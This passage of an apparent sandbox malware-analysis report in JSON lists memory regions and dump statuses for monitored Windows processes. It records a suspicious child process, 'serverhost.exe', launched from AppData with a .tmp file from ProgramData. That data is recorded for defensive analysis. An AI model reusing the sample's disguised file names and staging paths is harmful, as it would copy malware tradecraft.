"region_1859", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:01:25.429", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1860", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:01:25.430", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1861", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:01:25.430", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1862", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:01:25.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1863", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:01:25.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1864", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:01:25.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 503808, "start_va": 1986461696, "type": "region", "version": 1 }, "end_va": 1986965503, "entry_point": 1986468590, "filename": "\\Windows\\System32\\comdlg32.dll", "id": "region_1865", "name": "comdlg32.dll", "norm_filename": "c:\\windows\\system32\\comdlg32.dll", "region_type": "memory_mapped_file", "start_va": 1986461696, "timestamp": "00:01:25.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1866", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:25.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1867", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:01:25.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1868", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:01:25.434", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1869", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:01:25.434", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1870", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:01:25.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1871", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:01:25.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1999224831, "entry_point": 1998109245, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1872", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:01:25.436", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1873", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:25.436", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1874", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:01:25.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1875", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:01:25.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1910", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:25.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 724991, "entry_point": 0, "filename": null, "id": "region_1911", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:01:25.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4128767, "entry_point": 0, "filename": null, "id": "region_1912", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:01:25.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 7475199, "entry_point": 0, "filename": null, "id": "region_1913", "name": "pagefile_0x0000000000620000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6422528, "timestamp": "00:01:25.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 12976128, "type": "region", "version": 1 }, "end_va": 25559039, "entry_point": 0, "filename": null, "id": "region_1914", "name": "pagefile_0x0000000000c60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12976128, "timestamp": "00:01:25.561", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_1964", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:25.693", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5373951, "entry_point": 0, "filename": null, "id": "region_1965", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:01:25.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 7536640, "type": "region", "version": 1 }, "end_va": 10481663, "entry_point": 7536640, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1968", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 7536640, "timestamp": "00:01:25.709", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1911291904, "type": "region", "version": 1 }, "end_va": 1911345151, "entry_point": 1911291904, "filename": "\\Windows\\System32\\pstorec.dll", "id": "region_1969", "name": "pstorec.dll", "norm_filename": "c:\\windows\\system32\\pstorec.dll", "region_type": "memory_mapped_file", "start_va": 1911291904, "timestamp": "00:01:25.714", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1947992064, "type": "region", "version": 1 }, "end_va": 1948073983, "entry_point": 1947999657, "filename": "\\Windows\\System32\\atl.dll", "id": "region_1971", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1947992064, "timestamp": "00:01:25.809", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" \"C:\\ProgramData\\C572.tmp\"", "filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "id": "proc_13", "image_name": "serverhost.exe", "monitor_reason": "child_process", "monitored_id": 13, "origin_monitor_id": 11, "ref_parent_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000013-region_00001843-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_301", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1843", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:25.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1844", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:25.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_1845", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:25.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4296703, "entry_point": 0, "filename": null, "id": "region_1846", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:25.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 12845056, "type": "region", "version": 1 }, "end_va": 12955647, "entry_point": 12852624, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exeMh.exe", "id": "region_1847", "name": "serverhost.exemh.exe", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exemh.exe", "region_type": "memory_mapped_file", "start_va": 12845056, "timestamp": "00:01:25.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1848", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:01:25.423", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1849", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:01:25.423", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1850", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:25.426", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_1851", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:01:25.426", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1852", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:25.426", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1876", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:25.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1929215, "entry_point": 1507328, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1877", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1507328, "timestamp": "00:01:25.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_1878", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:01:25.469", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1879", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:01:25.469", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1880", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:01:25.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1881", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:25.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1885", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:01:25.497", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1886", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:25.498", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1887", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:01:25.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1888", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:01:25.501", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000013-region_00001889-addr_0x0000000000420000-size_0x00000000001f0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_302", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2031616, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 6356991, "entry_point": 0, "filename": null, "id": "region_1889", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:01:25.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1999224831, "entry_point": 1998109245, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1890", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:01:25.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1891", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:01:25.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1892", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:01:25.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1893", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:01:25.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1894", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:01:25.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 118784, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 380927, "entry_point": 267093, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1895", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:25.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 2785279, "entry_point": 0, "filename": null, "id": "region_1896", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:01:25.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1898", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:01:25.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1899", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:01:25.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5378047, "entry_point": 0, "filename": null, "id": "region_1900", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:01:25.531", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 6291456, "type": "region", "version": 1 }, "end_va": 6356991, "entry_point": 0, "filename": null, "id": "region_1901", "name": "private_0x0000000000600000", "norm_filename": null, "region_type": "private_memory", "start_va": 6291456, "timestamp": "00:01:25.531", "type": "region", "version": 1 }, { 